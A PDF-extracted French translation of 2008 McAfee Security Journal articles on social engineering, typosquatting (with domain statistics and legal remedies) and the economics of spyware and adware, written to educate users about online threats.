Elles peuvent être facilement testées sur des individus ou des groupes ciblés par le biais de techniques d'ingénierie sociale dans le processus de développement.

Associées à l'ingénierie sociale, elles offrent un retour sur investissement bien plus important qu'en procédant à des recherches supplémentaires dans le but d'une diffusion de masse.

ConclusionAu vu des dernières tendances en matière de vulnérabilités, l'ingénierie sociale est un phénomène contre lequel il est très difficile de lutter. Quels que soient les mécanismes de protection que les fournisseurs choisiront d'intégrer à leurs logiciels ou systèmes d'exploitation, les techniques d'ingénierie sociale les plus efficaces pourront les contourner tant que les utilisateurs continueront à cliquer sur tous les liens qu'ils rencontrent. Il n'est pas non plus question de compter à court terme sur une législation du cyberespace pour combattre ces nouvelles techniques (sauf dans le cas d'un dépôt de plainte pour fraude). Notre meilleure chance de limiter les pertes et l'impact sur des victimes trop confiantes réside essentiellement dans une meilleure éducation de l'utilisateur.

D'ici là, réfléchissez à deux fois avant de cliquer sur un lien pour « accepter » le prix formidable que vous avez prétendument remporté.

Rahul Kashyap dirige les services de Recherche sur les vulnérabilités et de Prévention des intrusions au sein de McAfee Avert Labs. Il est ainsi responsable des études sur les vulnérabilités, des analyses des attaques « jour zéro », du contenu des systèmes de prévention des intrusions et des procédures de réaction d'urgence. Kashyap est également un grand fan du personnage de bande dessinée Dilbert et espère un jour pouvoir créer sa propre série sur la vie d'un expert en sécurité.

NOTES 1 http://www.microsoft.com/technet/security/current.aspx 2 « How to Configure Memory Protection in Windows XP SP2 »

(Configuration de la protection de la mémoire dans Windows XP SP2) — http://www.microsoft.com/technet/security/prodtech/windowsxp/depcnfxp.mspx

3 « Analysis of GS protections in Microsoft Windows Vista » (Analyse des protections GS dans Microsoft Windows Vista) — http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf

4 « Browser Fuzzing for fun and profit » (Le fuzzing de navigateurs, pour le plaisir et pour l'argent) — http://blog.metasploit.com/2006/03/browser-fuzzing-for-fun-and-profit.html

5 « Month of Browser Bugs » (Le mois des bugs des navigateurs) — http://blog.metasploit.com/2006/07/month-of-browser-bugs.html

6 « AXFUZZ: An ActiveX/COM enumerator and fuzzer » (AXFUZZ : fuzzer et énumérateur actif de code ActiveX et COM) — http://sourceforge.net/projects/axfuzz/

7 « Hamachi », H D Moore et Aviv Raff — http://metasploit.com/users/hdm/tools/hamachi/hamachi.html

8 « 637 million Users Vulnerable to Attack » (637 millions d'utilisateurs vulnérables aux attaques), Frequency X — http://blogs.iss.net/archive/TheWebBrowserThreat.html

9 « Keep your operating system updated: Frequently asked questions » (Conservez votre système d'exploitation à jour : FAQ) — http://www.microsoft.com/protect/computer/updates/faq.mspx

10 « MS Office Flaws Ideal Tools for Targeted Attacks » (Les failles de MS Office sont des outils idéaux pour les attaques ciblées) — http://blog.washingtonpost.com/securityfix/2006/04/ms_office_flaws_ideal_tools_fo_1.html

11 http://www.gnucitizen.org/blog/0day-pdf-pwns-windows/ 12 « The New E-spionage Threat » (Cyberespionnage : la nouvelle menace) —

http://www.businessweek.com/print/magazine/content/08_16/b4080032218430.htm 13 « Dolphins' Web sites hacked in advance of Super Bowl » (Sites web des

Dolphins piratés en prévision du Super Bowl) — http://www.networkworld.com/news/2007/020207-dolphins-web-sites-hacked-in.html

14 « Hacking the interwebs » (Piratage Internet), 12 janvier 2008 — http://www.gnucitizen.org/blog/hacking-the-interwebs/

15 « Application-Specific Attacks: Leveraging the ActionScript Virtual Machine » (Attaques ciblées sur des applications : exploitation de la machine virtuelle ActionScript) — http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf

16 « Unusual Bugs » (Des bugs pas comme les autres), Ilja van Sprundel — http://www.ruxcon.org.au/files/2006/unusual_bugs.pdf

17 « Heap Feng Shui in JavaScript » (Feng Shui et Heap Overflow dans JavaScript) — http://www.determina.com/security.research/presentations/bh-eu07/ bh-eu07-sotirov-paper.html (Inscription obligatoire)

Page 34: MacAfee Security Journal Fr

34 McAFEE SECURITY JOURNAL

Les itinéraires inattendus de la navigation sur InternetBenjamin Edelman

Des bannières malveillantes aux logiciels publicitaires groupés, les sites que vous avez l'intention de visiter peuvent se révéler très dangereux. Méfiez-vous toutefois aussi des sites que vous n'aviez aucunement prévu de consulter, mais sur lesquels vous tombez par accident.

Stratégie de basePour ceux d'entre nous qui sont parfois imprécis lorsqu'ils saisissent une URL, il existe un type particulier de menace dont ils doivent se méfier. Ce fléau, touchant principalement les spécialistes des fautes de frappe, est appelé le « typosquatting » — de « typo », faute de frappe, et « squat », prendre abusivement possession d'un local vacant. La stratégie du typosquatteur consiste à anticiper les fautes de frappe pouvant être commises. Imaginez qu'en voulant saisir « bankofamerica.com », un utilisateur tape deux fois sur la touche « k » et omette le « e », entrant ainsi l'adresse « bankkofamrica.com ». Ce type de coquille entraînerait normalement un message d'erreur du navigateur et un renvoi vers le site officiel de Bank of America. Imaginez maintenant qu'un typosquatteur ait anticipé cette erreur. Rien ne l'empêche en effet d'enregistrer un nom de domaine sur la base d'une mauvaise orthographe (ou autres approximations) dans l'espoir que des utilisateurs peu attentifs y atterrissent.

A l'origine, les typosquatteurs exploitaient principalement les coquilles, qu'il s'agisse de caractères supplémentaires, manquants ou inversés. Depuis peu, ils font également appel à de nouvelles méthodes peu orthodoxes pour récupérer tout ce trafic non intentionnel. Un typosquatteur peut en effet enregistrer le nom de domaine « wwwmcafee.com », ce qui dirigerait vers son site tout utilisateur omettant le point séparant les trois w du nom de domaine dans l'URL « www.mcafee.com ». (Pour l'anecdote, ceci est réellement arrivé. McAfee fait en ce moment le nécessaire pour récupérer ce nom de domaine.) Dans le cas des points de séparation, les typosquatteurs anticipent à juste titre le comportement des

navigateurs, qui ajoutent automatiquement le suffixe « .com » aux noms de domaine sans domaine de premier niveau, et enregistrent ainsi des adresses de type « www.mcafeecom.com ». D'autres typosquatteurs préfèrent concentrer leurs efforts sur les préfixes de type « http » ou enregistrer les domaines .com pour les sites résidant justement dans d'autres domaines de premier niveau.

Comment les utilisateurs sont-ils amenés sur ces sites détournés ? Certains utilisateurs oublient l'orthographe exacte de l'adresse d'un site, d'autres font des fautes de frappe. (Cela est particulièrement vrai pour les utilisateurs ne parlant pas ou peu anglais, les personnes ayant des problèmes de vue ou encore ceux qui ne sont pas tout à fait à l'aise avec un clavier.) Les utilisateurs débutants peuvent ne pas connaître la syntaxe correcte de l'adresse d'un site web, tandis que les plus pressés commettent des erreurs d'inattention. Même les utilisateurs les plus chevronnés ne sont pas à l'abri d'une erreur lorsqu'ils saisissent une URL à partir du minuscule clavier d'un téléphone portable ou d'une tablette avec reconnaissance d'écriture manuscrite, ou encore lorsqu'ils se trouvent en voiture sur une route accidentée. On ne peut ainsi en vouloir à personne d'entrer une adresse erronée et de se retrouver sur un site utilisant une technique de typosquatting. Au contraire d'ailleurs, car bien qu'il soit certain que ces sites sont visités par de nombreux utilisateurs, c'est généralement à la suite d'une erreur.

Etendue du phénomèneComptant sur la part importante d'utilisateurs commettant des erreurs, le typosquatting s'est développé de manière remarquable. Le service McAfee SiteAdvisor® réalise en permanence des recherches sur les typosquatteurs. L'étude réalisée par McAfee Avert Labs en mai 2008 a répertorié plus de 80 000 domaines de typosquatting dérivés des 2 000 sites web les plus populaires. Et plus on creuse, plus on se rend compte de l'ampleur du phénomène.

Une simple navigation innocente sur Internet peut vous exposer aux nombreuses attaques décrites dans ce McAfee Security Journal.

Page 35: MacAfee Security Journal Fr

AUTOMNE 2008 35

Les sites web fréquentés par les enfants sont des cibles particulièrement privilégiées des typosquatteurs. Une analyse récente a par exemple démontré que 327 sites de typosquatting dérivés de « cartoonnetwork.com » avaient déjà été enregistrés. Dans la liste établie par SiteAdvisor, « Freecreditreport.com » arrivait en tête des sites détournés, suivi par des sites tels que YouTube, Craigslist, Wikipedia ou Bank of America. (La figure 1 propose quelques données statistiques. Pour des exemples de détournements orthographiques, voir l'annexe.)

Recours légauxQuelles que soient ses formes, le typosquatting est une pratique illégale aux Etats-Unis. La loi de protection des utilisateurs contre le cybersquattage (ACPA) de 1999 (15 USC §1125(d)) interdit l'enregistrement, le trafic et l'utilisation de noms de domaine identiques ou d'une similarité portant à confusion avec des marques ou des noms connus. L'ACPA prévoit des dommages à hauteur des profits engendrés de manière illicite par le typosquatteur incriminé (15 USC §1117(a)(1)), ou allant de 1 000 $ à 100 000 $ par domaine de typosquatting répertorié (à la discrétion du tribunal) (§1117(d)).

Certains pays bénéficient d'une législation quelque peu différente en matière de typosquatting, mais la plupart d'entre eux considèrent cette pratique comme une violation des droits de marque et l'interdisent de fait. En outre, la Politique uniformisée

freecreditreport.com

DOMAINE

cartoonnetwork.com

youtube.com

craigslist.org

blogspot.com

clubpenguin.com

wikipedia.com

runescape.com

miniclip.com

bankofamerica.com

dailymotion.com

metroflog.com

addictinggames.com

friendster.com

myspace.com

verizonwireless.com

facebook.com

742

NOMBRE DE DOMAINESDE TYPOSQUATTING

327

320

318

276

271

266

264

263

251

250

249

248

246

239

238

235

Figure 1 : Liste des sites les plus touchés par le typosquatting. Ce tableau répertorie les marques les plus détournées par les typosquatteurs. Ces données sont tirées de l'étude des analyses SiteAdvisor en mai 2008.

Le service McAfee SiteAdvisor réalise en permanence des recherches sur les typosquatteurs. L'étude réalisée par McAfee Avert Labs en mai 2008 a répertorié plus de 80 000 domaines de typosquatting dérivés des 2 000 sites web les plus populaires.

de résolution de litiges en matière de noms de domaine (UDRP, Uniform Domain Name Dispute Resolution Policy) permet un arbitrage pour régler les plaintes éventuelles. Pour enregistrer un site sur un domaine de premier niveau important, l'abonné doit accepter la juridiction de l'UDRP, ce qui signifie que cette politique s'applique quel que soit le pays où se trouve le domaine de typosquatting. Toutefois, les recours de l'UDRP sont limités à la confiscation du domaine mis en cause, sans paiement de dommages éventuels.

Bien que l'ACPA prévoie d'importantes pénalités, les typosquatteurs semblent avoir déjà compris que leur application est peu probable. Ainsi, malgré la menace de lourdes sanctions financières, les typosquatteurs continuent à œuvrer en toute impunité.

Stratégie financière des typosquatteurs Dès qu'un utilisateur arrive sur un site de typosquatting, son propriétaire met tout en œuvre pour gagner le plus d'argent possible.

Il y a quelques années, le célèbre typosquatteur John Zuccarini imposait à ses innocents visiteurs l'affichage de sites web pour adultes. Zuccarini avait enregistré pas moins de 8 000 domaines différents, comme j'ai pu le décrire dans une précédente étude1. Celui-ci ne s'en est finalement pas tiré à si bon compte : en septembre 2003, Zuccarini a été arrêté pour violation de la loi sur l'intégrité des noms de domaines (Truth in Domain Names Act), interdisant toute action utilisant un nom de domaine trompeur dans le but d'amener une personne à visualiser des contenus obscènes.

L'approche usuelle des typosquatteurs repose désormais sur la publicité. Parmi les milliers de domaines de typosquatting que j'ai pu étudier ces dernières années, il est rare d'en rencontrer un qui n'affiche aucune publicité.

Page 36: MacAfee Security Journal Fr

36 McAFEE SECURITY JOURNAL

Lorsque ces sites en présentent, les publicités ont généralement été sélectionnées pour leur pertinence vis-à-vis du contenu que l'utilisateur souhaitait vraisemblablement consulter. Si l'on reprend l'exemple de bankkofamrica.com cité précédemment, on peut s'attendre à ce que les publicités proposées concernent des services bancaires. Oui, mais lesquels ? Avant tout bien sûr, on devrait trouver Bank of America (voir figure 2). Pas de surprise, donc. D'un côté, cette publicité s'avère bénéfique pour Bank of America : elle parvient quand même à toucher l'utilisateur, malgré la faute de frappe empêchant la prise de contact initiale. D'autre part, il est assez incroyable qu'un typosquatteur fasse payer Bank of America la possibilité de toucher un client qui souhaitait volontairement se rendre sur leur site. Après tout, ce typosquatteur ne fait rien d'autre que violer les droits de marque de Bank of America ; il se rend ainsi coupable d'une infraction à l'ACPA, selon laquelle il est interdit d'enregistrer des noms de

domaine de ce type et ce typosquatteur devrait même payer d'importants dommages et intérêts à Bank of America si celle-ci portait plainte. Etonnamment, on constate que ce typosquatteur facture en fait de l'espace publicitaire à Bank of America, dont on peut supposer, au moins à l'origine, qu'elle n'était pas consciente de cette entourloupe.

Comment cela est-il possible ? En fait, les typosquatteurs ne vendent pas directement leur espace publicitaire aux annonceurs. (Imaginez la scène : « Bonjour, seriez-vous intéressés par un espace publicitaire sur notre site de typosquatting ? – Pardon ?? ») Concrètement, les typosquatteurs vendent leurs services aux réseaux publicitaires, qui eux-mêmes recherchent des annonceurs. Le plus grand réseau de ce type est Google, dont le produit AdSense for Domains et autres services de syndication pour domaines gèrent, d'après les données relevées par SiteAdvisor, les publicités de plus de 80 % des sites de typosquatting.

Figure 2 : Un typosquatteur a enregistré un nom de domaine proche de celui d'une banque connue, puis fait payer (indirectement) ses espaces publicitaires à cette même banque et à d'autres.

Page 37: MacAfee Security Journal Fr

AUTOMNE 2008 37

Evolution du phénomèneEn juin 2008, l'ICANN (Internet Corporation for Assigned Names and Numbers) a voté l'accélération du processus de création de nouveaux domaines de premier niveau. Outre les domaines familiers à la plupart des internautes, il existe déjà certains domaines moins connus comme .info, .biz, .museum et .travel. Nous pourrons bientôt compter avec de nouveaux domaines, tels que .nyc ou .lib (comme certains ont pu le suggérer). Ces nouveaux domaines représentent bien évidemment de nouvelles opportunités pour les typosquatteurs, qu'ils choisissent d'enregistrer de vrais noms de marques avec ces nouveaux domaines ou misent sur d'autres erreurs typographiques. Lorsque les utilisateurs demanderont l'accès à des sites sur ces domaines, leurs erreurs les propulseront directement dans le giron des typosquatteurs, déjà prêts à les accueillir avec leurs sites détournés.

Certains indices laissent cependant penser que le typosquatting pourrait connaître une perte de vitesse. D'une part, certains sites web importants ont mis en place des mesures de protection contre les typosquatteurs, à la fois pour eux-mêmes et pour leurs clients. Par exemple, en 2006 Neiman Marcus a porté plainte contre la société d'enregistrement de noms de domaine Dotster. Neiman Marcus accusait Dotster d'avoir enregistré un grand nombre de domaines portant atteinte aux marques de Neiman Marcus, et de profiter des publicités affichées pour tirer d'importants bénéfices de ces sites détournés. Neiman Marcus considérait que l'implication de Dotster ne se limitait pas à l'enregistrement simple de ces domaines, dans la mesure où la société choisissait les domaines qu'elle enregistrait et tirait un avantage pécuniaire des publicités diffusées sur ces sites. L'affaire fut classée en 2007 selon des modalités confidentielles. Depuis, Neiman Marcus s'est attaqué à d'autres importants squatteurs. (Pour information, j'ai eu l'occasion de conseiller Neiman Marcus pour certaines de ces affaires.) Verizon et Microsoft se sont également montrés vigilants dans des affaires semblables. D'un côté, ce type de procès n'est pas particulièrement courant. Toutefois, les dommages et intérêts prévus par l'ACPA, soit un minimum de 1 000 dollars par domaine, peuvent représenter des sommes importantes dans le cas de violations à grande échelle. A elle seule, la société Microsoft a reçu plus de deux millions de dollars dans le cadre d'affaires de typosquatting.

Certaines rumeurs persistances indiquent que de grands réseaux publicitaires, Google notamment, pourraient se détourner de l'industrie du typosquatting. Une affaire récente portée en action collective a dénoncé le rôle de Google dans le financement de ce secteur, et les publicités tirant parti du typosquatting ont été à l'origine de nombreuses plaintes impliquant annonceurs et propriétaires de marques. Si Google cessait tout financement

de cette pratique, les typosquatteurs seraient nettement moins motivés par l'enregistrement de domaines détournés, dans la mesure où aucun autre réseau publicitaire ne les rémunèrerait aussi grassement que Google. (Pour information, j'interviens en tant que conseiller dans le procès Vulcan Golf contre Google, affaire pour violation des droits de marque portée en action collective traitant de la responsabilité de Google dans les sites de typosquatting où Google achète des espaces publicitaires.)

Moyens de défenseBien que la lutte contre le typosquatting continue, les internautes ont de nombreux moyens de protection à leur portée. Le plus important : être attentif à ce que l'on tape. Méfiez-vous du typosquatting, surtout lorsque l'adresse d'un site est particulièrement difficile à orthographier. Si vous ne connaissez pas un nom de domaine, n'essayez pas de le deviner ; passez plutôt par un moteur de recherche.

Ensuite, une fois arrivé sur un site, soyez vigilant. S'agit-il bien du site que vous souhaitiez visiter ? Le lien est-il bien un pointeur ordinaire, ou s'agit-il d'une annonce publicitaire ? Le site d'une administration publique devrait-il vraiment être en .com ? Ne devriez-vous pas plutôt consulter un site en .gov ? Avec un peu de sens critique, vous pourrez vous défendre efficacement contre le typosquatting et d'autres menaces du même type.

Certains logiciels spécialisés peuvent également permettre de bénéficier d'une protection contre les typosquatteurs. SiteAdvisor reconnaît de nombreux sites de ce type. Un service de résolution des erreurs de frappe, comme OpenDNS, vous assure une protection supplémentaire. Les moteurs de recherche sont eux aussi utiles, puisqu'ils proposent le plus souvent de corriger les fautes les plus plausibles : vous pouvez ainsi éviter de nombreux sites de typosquatting en effectuant des recherches plutôt qu'en tapant directement un nom de domaine directement dans la barre d'adresse de votre navigateur.

Benjamin Edelman est maître assistant à la Harvard Business School, où il étudie les sites de marché électroniques et la fraude en ligne. Il est également conseiller spécial pour le service SiteAdvisor de McAfee, proposant un point de vue extérieur aux évaluations de sites effectuées par SiteAdvisor. Et même si sa technique de frappe est généralement irréprochable, le professeur Edelman a parfois lui aussi emprunté les chemins de traverse de la navigation Internet.

NOTES 1 « Large-Scale Registration of Domains with Typographical Errors »

(Enregistrement à grande échelle de noms de domaine contenant des erreurs typographiques), janvier 2003, Harvard Law School — http://cyber.law.harvard.edu/archived_content/people/edelman/typo-domains/

ccartoonnetwork.comdcartoonnetwork.comncartoonnetwork.comcfartoonnetwork.comceartoonnetwork.com

ckartoonnetwork.comjcartoonnetwork.comvcartoonnetwork.comcaertoonnetwork.comcaortoonnetwork.com

cairtoonnetwork.comcuartoonnetwork.comacartoonnetwork.combcartoonnetwork.comcanrtoonnetwork.com

ANNEXE Exemples de sites de typosquatting : Cartoonnetwork.comParmi les 80 000 domaines analysés en mai 2008 par SiteAdvisor, nous avons identifié les variations suivantes du domaine « cartoonnetwork.com » :

Page 38: MacAfee Security Journal Fr

38 McAFEE SECURITY JOURNAL

Ces applications sont souvent utilisées dans le cadre de techniques d'ingénierie sociale et phagocytent généralement des logiciels gratuits (freewares) ou à contribution volontaire (sharewares), par ailleurs très utiles, téléchargés par les internautes. Ces applications indésirables sont d'ailleurs fournies avec des contrats de licence censés définir les limites de leur comportement. Ceux-ci sont toutefois rarement explicites et utilisables, trompant l'utilisateur et laissant le champ libre aux pièges de l'ingénierie sociale.

Au début de la décennie, les logiciels espions (spywares) et les logiciels publicitaires (adwares), souvent appelés « programmes potentiellement indésirables », ont vu leur nombre augmenter de manière exponentielle. Après 2005, on a cependant assisté à un déclin constant de ce nombre. Dans le présent article, nous étudierons les principaux changements survenus dans les modèles de compensation en ligne qui ont joué un rôle important dans cette diminution. Les logiciels espions et logiciels publicitaires sont répartis en deux catégories bien distinctes : l'une comprend des applications plus saines et des modèles plus élaborés nécessitant l'approbation de l'utilisateur, développés par des acteurs clés dans le domaine des logiciels publicitaires ; l'autre comprend des logiciels parfois malveillants et souvent définis comme étant des chevaux de Troie. Cette distinction relativement claire a permis de limiter le nombre des logiciels espions et des logiciels publicitaires. Cependant, si ces programmes potentiellement indésirables ne représentent plus une réelle menace, peut-on espérer les voir disparaître à tout jamais ? Pour répondre à cette question, nous étudierons les changements qui ont eu lieu dans le paysage des menaces, ainsi que le rôle des techniques d'ingénierie sociale.

DéfinitionsLes termes logiciel publicitaire (adware) et logiciel espion (spyware) sont souvent utilisés de manière approximative ou comme s'ils étaient synonymes, ce qui entretient souvent la confusion. Pour plus de clarté, nous avons choisi d'utiliser les définitions établies par l'Anti-Spyware Coalition (ASC)1.

Logiciel publicitaire Il s'agit d'un type de programme de diffusion de publicités, dont l'objectif premier est de diffuser du contenu publicitaire, mais selon des procédés et dans des contextes généralement inattendus et non souhaités par l'utilisateur. Le modèle de risque défini par l'ASC décrit en détail divers comportements pouvant être considérés comme inattendus ou indésirables. De nombreuses applications publicitaires disposent également de fonctions de suivi et peuvent, à ce titre, être qualifiées de technologies de suivi. Il est possible que certains utilisateurs veuillent supprimer des logiciels publicitaires s'ils sont opposés à ce type de suivi, qu'ils ne souhaitent pas voir s'afficher les publicités proposées par ces programmes ou qu'ils sont incommodés par leurs effets sur les performances de leur système. A l'inverse, il est possible que d'autres désirent conserver des logiciels publicitaires bien précis s'ils leur permettent de réduire le coût d'un produit ou d'un service particulier, ou si le contenu publicitaire proposé leur semble utile et pertinent, comme des publicités sur des produits concurrents ou complémentaires à ceux qu'il détient.

Logiciel espion Stricto sensu, cette expression désigne un logiciel de suivi déployé sans que l'utilisateur en soit averti, sans son consentement et sans qu'il en ait la maîtrise. Au sens large, les logiciels espions correspondent à ce que l'ASC qualifie de « Spywares et autres technologies potentiellement indésirables ». En d'autres mots, des technologies déployées sans le consentement préalable de l'utilisateur ou mises en œuvre de manière à limiter le contrôle de l'utilisateur sur :

– des modifications importantes affectant l'utilisation, la confidentialité ou la sécurité du système ;

– l'utilisation des ressources système, y compris les applications installées ;

– la collecte, l'exploitation et la diffusion de données personnelles ou sensibles.

Qu'est-il donc arrivé aux logiciels espions et aux logiciels publicitaires ?Aditya Kapoor

Les logiciels espions et publicitaires font partie des outils les plus utilisés pour la publicité et le marketing en ligne.

Page 39: MacAfee Security Journal Fr

AUTOMNE 2008 39

Conscients que le terme générique de « logiciel espion » s'est grandement éloigné de son sens d'origine, les membres de l'ASC ont décidé de l'utiliser (au sens propre) pour les documents techniques. Conscients également du fait qu'il est impossible d'éviter les connotations associées à ce terme dans l'usage courant, l'ASC prend note de l'acception générale du terme comme incluant l'ensemble des programmes potentiellement indésirables. Dans le présent article, le terme logiciel espion ne sera jamais utilisé au sens large, mais toujours au sens propre, désignant ainsi un logiciel utilisé à des fins de marketing. Pour les programmes espions au sens strict, comme les enregistreurs de frappe, nous utiliserons le terme logiciels de surveillance.

Un démarrage fulgurantLes logiciels espions et logiciel publicitaires ont attiré notre attention au cours de l'année 2000 avec l'apparition d'Adware-Aureate, qui utilisait l'historique de navigation de l'utilisateur pour diffuser des publicités. Cet événement a entraîné la création de l'une des premières applications de protection antispyware : OptOut, par la Gibson Research Corporation2.

Ces logiciels ont connu leur essor fin 2004 et ont vu leur nombre exploser en 2005 (voir figures 1 et 2). Leur premier objectif était de générer des profits en étant installés sur des millions d'ordinateurs (selon le modèle avec paiement à l'installation) mais aussi en affichant des publicités (dans le cadre d'un paiement au clic). L'industrie des logiciels espions et des logiciels publicitaires a prospéré ces trois dernières années grâce aux importants revenus générés par la publicité. Chaque fois qu'un utilisateur cliquait sur une publicité, la société émettrice recevait une commission.

Modèles de compensation et mises en gardeLes logiciels espions et logiciels publicitaires font appel à deux modèles de compensation différents pour la publicité en ligne. Dans un monde idéal, ces modèles fonctionneraient parfaitement, mais quelle est réellement la situation dans un monde où existent des personnes malintentionnées ? Examinons un instant comment ces modèles peuvent être exploités.

Paiement à l'installation : le modèle côté client3 Selon le modèle avec paiement à l'installation, des sociétés marchandes et de services paient des fournisseurs de logiciels publicitaires pour diffuser leurs annonces. Ces derniers font à leur tour appel à des partenaires ou à des sociétés affiliées pour distribuer leurs logiciels publicitaires, notamment en les combinant à d'autres applications. (Aux Etats-Unis par exemple, ZangoCash paie entre 0,75 et 1,45 dollar pour chaque installation de son logiciel publicitaire4.) Il ne reste alors plus qu'à attendre que le logiciel soit installé sur l'ordinateur d'un utilisateur.

Selon ce modèle, un paramètre d'identification particulier est utilisé pour détecter les installations effectuées. Ainsi, si Paul Dupont héberge sur son site web le programme d'installation d'un logiciel publicitaire avec paiement à l'installation, et qu'un utilisateur télécharge et installe ce logiciel via le site de Paul, ce dernier percevra une rémunération définie. Pour augmenter le nombre de téléchargements sur son site, Paul essaie alors d'attirer de nouveaux visiteurs à l'aide de contenus attrayants, comme des titres accrocheurs, des images et vidéos pour adultes, ou encore des jeux et sonneries téléphoniques gratuits.

Au fur et à mesure que le trafic et sa rémunération augmentent, Paul décide d'utiliser un exploit afin d'installer ce logiciel publicitaire sans que l'utilisateur en ait conscience. De nombreuses applications de ce type affichent un contrat de licence avant l'installation. Considérant que cela ne ferait qu'apeurer les visiteurs, Paul décide de modifier l'application de manière à empêcher l'affichage de ce contrat afin de multiplier le nombre d'installations. Si Paul s'avère être un pirate chevronné, il pourra reproduire ce modèle sur des milliers de sites web infectés et décupler de manière exponentielle aussi bien le nombre d'installations que sa propre rémunération. Benjamin Edelman, également auteur pour McAfee Security Journal, décrit un scénario similaire sur son site web5.

Le modèle de compensation avec paiement à l'installation s'est avéré très lucratif pour les programmeurs et les personnes malintentionnées, ce qui a contribué à la croissance exceptionnelle du nombre de logiciels espions et de logiciels publicitaires. Dans ce modèle, de nombreux vecteurs d'installation sont utilisés. Ceux-ci peuvent être classés en deux catégories distinctes :

Ingénierie sociale Cette technique nécessite l'intervention de l'utilisateur non seulement dans l'installation d'un logiciel, mais parfois aussi dans sa diffusion. Le nombre de méthodes d'ingénierie sociale n'a de limite que l'imagination des auteurs d'attaques, qui parviennent d'ailleurs souvent à tromper les utilisateurs les plus avertis. Pour reprendre l'exemple de Paul Dupont, la perspective d'obtenir gratuitement des jeux ou des sonneries téléphoniques est une tentation à laquelle peu de personnes savent résister. Quoi qu'il en soit, c'est à l'utilisateur de décider s'il accepte de prendre des risques ou de laisser aux autres tous ces cadeaux qu'on lui propose gratuitement.

5 000

4 000

3 000

2 000

1 000

02000 2001 2002 2003 2004 2005 2006 2007 2008

(estimation)

300

250

200

150

100

50

02008

(estimation)20072006200520042003200220012000

Figure 2 : Les logiciels espions et les logiciels de surveillance ont vu leur nombre diminuer globalement depuis 2005, mais nous devons nous attendre à une recrudescence fin 2008. (Source : McAfee Avert Labs)

Figure 1 : Le nombre de logiciels publicitaires a atteint son apogée en 2005. (Source : McAfee Avert Labs)

Logiciels publicitaires

Logiciels espions et logiciels de surveillance

Logiciels espions

Logiciels de surveillance

Page 40: MacAfee Security Journal Fr

40 McAFEE SECURITY JOURNAL

Exploits L'installation de logiciels publicitaires par le biais d'exploits peut être effectuée sans intervention de l'utilisateur, bien que celui-ci soit dans la plupart des cas appâté par des techniques d'ingénierie sociale vers des sites web malveillants hébergeant ces mêmes exploits.

Paiement au clic : le modèle côté serveur6 Le modèle avec paiement au clic existe sous deux formes : les publicités sponsorisées et les publicités basées sur le contenu.

Ce modèle ne requiert aucune installation de logiciel espion ou de logiciel publicitaire sur l'ordinateur de l'utilisateur, mais peut exploiter le contenu saisi ou demandé (à partir des résultats proposés par un moteur de recherche, p. ex.) pour diffuser des publicités ciblées. Les publicités contextuelles de Google, notamment, fonctionnent sur le modèle du paiement au clic.

Les mécanismes de diffusion les plus répandus de publicité par paiement au clic sont les suivants :

Bannières publicitaires Les publicités sont affichées sous forme de bannières ou de zones délimitées. Leur contenu peut être modifié régulièrement.

Fenêtres pop-up en avant ou en arrière plan Les publicités sont affichées sous forme de fenêtres séparées, représentant une gêne pour l'utilisateur.

Publicités au format Flash Ces publicités sont semblables aux bannières publicitaires, à la différence que les publicités sont animées et que leur contenu évolue.

Le modèle avec paiement au clic peut fonctionner de manière bien plus contrôlée, dans la mesure où le responsable du site web hébergeant ces publicités peut en choisir le mécanisme de diffusion. Bien que ce modèle soit basé sur le serveur et semble plus sûr pour l'utilisateur, il n'est pas dénué de risques. Certains arnaqueurs peuvent toujours utiliser des pratiques trompeuses pour piéger les utilisateurs7.

La plupart des contenus publicitaires étant stockés sur des serveurs et faisant appel à des technologies de type JavaScript et Flash notamment, l'insertion de publicités malveillantes à la source ne pose aucune difficulté8, 9. A titre d'exemple, un réseau publicitaire détenu par Yahoo a pendant un certain temps diffusé sans le savoir des bannières publicitaires malveillantes ayant pour effet le téléchargement de chevaux de Troie sur les ordinateurs des utilisateurs. Dans ce cas particulier, les bannières étaient affichées sur des sites aussi populaires que MySpace et PhotoBucket. Ces publicités malveillantes avaient été intégrées au réseau publicitaire de Yahoo sans être détectées. Il est également arrivé que le système de clic soit corrompu par des techniques d'empoisonnement du cache DNS10. Les utilisateurs ne sont toutefois pas affectés directement dans ce cas ; les fournisseurs d'accès et les serveurs publicitaires sont en effet plus vulnérables à ce type de menace.

Pour réduire plus efficacement les vecteurs d'attaque exploitant ces modèles de compensation, il est important d'examiner rapidement le rôle que jouent les techniques d'ingénierie sociale sur un marché où le nombre d'opportunités de génération de revenus est quasiment illimité.

Les différents aspects de l'ingénierie sociale Les pirates informatiques s'attaqueront toujours au maillon le plus faible du système de sécurité, c'est-à-dire l'utilisateur lui-même. — Kevin Mitnick (2007)11

Quel que soit le modèle utilisé par les développeurs de logiciels publicitaires, le facteur de réussite principal reste l'utilisateur. Dans l'exemple de Paul Dupont, les utilisateurs étaient infectés après avoir visité le site web malveillant, attirés par les stratégies d'ingénierie sociale de Paul. L'une des raisons pour lesquelles ces stratégies fonctionnent si bien est que la plupart des utilisateurs font par nature confiance à ce qu'on leur présente et ne se méfient pas de certaines activités en ligne. Les concepteurs de techniques d'ingénierie sociale aux intentions malveillants savent quant à eux très bien exploiter les faiblesses de la nature humaine. Une étude de cas réalisée par le ministère de l'Intérieur américain révèle que 84 % des administrations américaines attribuent un certain nombre de failles de sécurité à des erreurs humaines et 80 % les expliquent par un manque de formation et de connaissances en matière de sécurité ou à un non-respect des procédures mises en place12.

Des centaines de milliers de logiciels malveillants font appel à des techniques d'ingénierie sociale pour pouvoir être installés sur les ordinateurs des utilisateurs : il s'agit de l'un des vecteurs les plus courants dans la diffusion des logiciels malveillants. Matthew Braveman classe les différents vecteurs d'installation en quatre catégories principales13. Selon ses travaux, près d'un tiers des logiciels malveillants a été installé à la suite de l'utilisation de techniques d'ingénierie sociale.

